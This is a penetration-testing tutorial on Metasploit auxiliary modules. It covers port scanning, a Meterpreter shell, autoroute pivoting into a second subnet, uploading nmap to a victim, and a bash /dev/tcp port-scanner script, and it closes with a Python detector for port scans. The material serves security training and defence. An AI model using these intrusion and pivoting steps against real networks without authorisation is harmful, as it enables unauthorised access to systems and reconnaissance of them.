Auxiliary modules in Metasploit are used for tasks like scanning, discovery, and fuzzing. They can perform both TCP and UDP port scans and gather information from services like FTP, SSH, and HTTP. These modules are useful during both the information-gathering and post-exploitation phases of a penetration test. Once initial access is obtained, auxiliary modules can be used to discover hosts and scan ports on different network subnets. Their primary function is to extract information rather than exploit vulnerabilities directly.
Demo: Attacking, Pivoting, Discovery
Imagine you’re tasked with infiltrating a target network. Your first step is to use auxiliary modules to identify open ports on your initial target. After uncovering a vulnerable service, you exploit it, securing a foothold within the system. With this access, you pivot into a different network subnet, gaining a pathway to other systems. From there, you use auxiliary modules again to scan for open ports on a second target. How would you approach this plan?
Goals
1. Discover open ports on your first target.
2. Exploit the service running on the target to gain an initial foothold.
3. Use that foothold to pivot and access other systems on a different network subnet.
4. Scan for open ports on the second target using auxiliary modules.
Execution
# 1. Search for port scanning auxiliary modules
search portscan
# 2. Select the desired port scanning module by number or name from the search results
use number/name
# 3. Display options to configure the module
show options          # Review the required and optional parameters for the module
# 4. Set the target IP address for port scanning
set RHOSTS [IP1]      # Replace [IP1] with the target's IP address
# 5. Execute the port scan
run                   # Starts the port scanning process

# ---- Meterpreter Session: Post-exploitation ----
# 6. Open an interactive shell in the compromised machine
meterpreter > shell
# 7. Start a bash shell on the remote target
/bin/bash -i          # Interact with the target's shell
# 8. Check the network configuration to identify interfaces and potential routes for pivoting
ifconfig              # View the network interfaces to see the available network subnets

# ---- Pivoting: Accessing another network ----
# 9. Set up pivoting through the compromised machine to reach another network (IP2)
meterpreter > run autoroute -s [IP2]   # Add a route to the new subnet, allowing scanning of [IP2]
# 10. Return the Meterpreter session to the background so other commands can be run
background            # Background the current session to continue scanning
# 11. List active Meterpreter sessions to resume if needed
sessions              # Display the active sessions for further actions

# ---- Repeat for the second target (IP2) ----
# 12. Search for a port scanning auxiliary module again for the second target
search portscan
# 13. Use the selected module for port scanning
use number/name
# 14. Show the options to configure the new scan
show options
# 15. Set RHOSTS to the IP address of the second target
set RHOSTS [IP2]      # Replace [IP2] with the second target's IP
# 16. Run the port scan on the second target
run                   # Start scanning the second target
autoroute: Sets up pivoting to access other subnets.
A network route is the path, or set of rules, that data packets follow to reach a destination across a network. In penetration testing, adding routes (for example, with the autoroute command in Meterpreter) enables pivoting: access to one compromised system is used to reach network segments that are not directly reachable from the attacker's host.
Meterpreter sessions are interactive command-line interfaces that allow an attacker to control a compromised system after an exploit succeeds. These sessions provide access to various tools for further exploitation, privilege escalation, and post-exploitation activities like running commands, uploading/downloading files, or pivoting.
Alternative Post Exploitation
Copying nmap to Victim 1
file /usr/bin/nmap              # check that the nmap binary exists on the attacker machine
sessions -i 1                   # resume Meterpreter session 1
upload /usr/bin/nmap /tmp/nmap  # copy the binary to the victim via Meterpreter's upload command
Copying a scanner to Victim 1
#!/bin/bash
# bash based port scanner: usage ./scan.sh <target-ip>
# Uses bash's built-in /dev/tcp pseudo-device, so no nmap is needed on the victim.
target="$1"
if [ -z "$target" ]; then
  echo "usage: $0 <target-ip>" >&2
  exit 1
fi
for port in {1..1000}; do
  # timeout 1 aborts connections that hang on filtered ports; a successful echo means the port accepted the TCP handshake
  timeout 1 bash -c "echo >/dev/tcp/$target/$port" 2>/dev/null && echo "port $port is open"
done
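From the defender's side, the scanner above and the portscan auxiliary modules produce the same signature: one source touching many distinct ports on one host within a short time. The following detector is an added example, not part of the original notes; it parses a constructed, made-up connection log format (timestamp, source, destination:port, verdict) and flags source/destination pairs that reach a threshold of distinct ports inside a sliding time window. The log format, threshold and window are assumptions chosen for illustration.

```python
from collections import defaultdict
from datetime import datetime


def build_sample_log():
    """Constructed sample log lines (not captured traffic).

    Format assumed for this example: '<ISO time> <src> -> <dst>:<dport> <verdict>'.
    10.0.1.5 sweeps ports 1..15 on 10.0.2.9 in 15 seconds (scanner-like);
    10.0.1.7 only talks to 443 and 80 (benign client).
    """
    lines = []
    for port in range(1, 16):
        lines.append(f"2024-05-01T10:00:{port:02d} 10.0.1.5 -> 10.0.2.9:{port} REJECT")
    for sec in range(5):
        lines.append(f"2024-05-01T10:01:{sec:02d} 10.0.1.7 -> 10.0.2.9:443 ACCEPT")
    lines.append("2024-05-01T10:01:30 10.0.1.7 -> 10.0.2.9:80 ACCEPT")
    return lines


def parse_line(line):
    """Split one log line into (timestamp, src, dst, dport)."""
    ts, src, _arrow, dst_port, _verdict = line.split()
    dst, dport = dst_port.rsplit(":", 1)
    return datetime.fromisoformat(ts), src, dst, int(dport)


def detect_scans(lines, min_ports=10, window_seconds=60):
    """Return [(src, dst, distinct_ports)] for pairs whose peak number of
    distinct destination ports inside any window of window_seconds reaches
    min_ports. Both the verdict and repeated hits on the same port are
    ignored: a scan is about port breadth, not connection count."""
    events = defaultdict(list)  # (src, dst) -> [(timestamp, dport), ...]
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ts, src, dst, dport = parse_line(line)
        events[(src, dst)].append((ts, dport))

    alerts = []
    for (src, dst), evs in events.items():
        evs.sort()
        peak = 0
        start = 0
        # Sliding window over time-sorted events; recount distinct ports per window
        for end in range(len(evs)):
            while (evs[end][0] - evs[start][0]).total_seconds() > window_seconds:
                start += 1
            distinct = len({port for _, port in evs[start:end + 1]})
            peak = max(peak, distinct)
        if peak >= min_ports:
            alerts.append((src, dst, peak))
    return alerts


if __name__ == "__main__":
    for src, dst, n in detect_scans(build_sample_log()):
        print(f"possible port scan: {src} -> {dst} ({n} distinct ports within window)")
```

Tuning note: a threshold of 10 distinct ports in 60 seconds catches the sequential sweep above and the default behaviour of most scanners, but a slow scan spread over hours will stay under it; widen the window or track distinct ports per source per day if that is a concern.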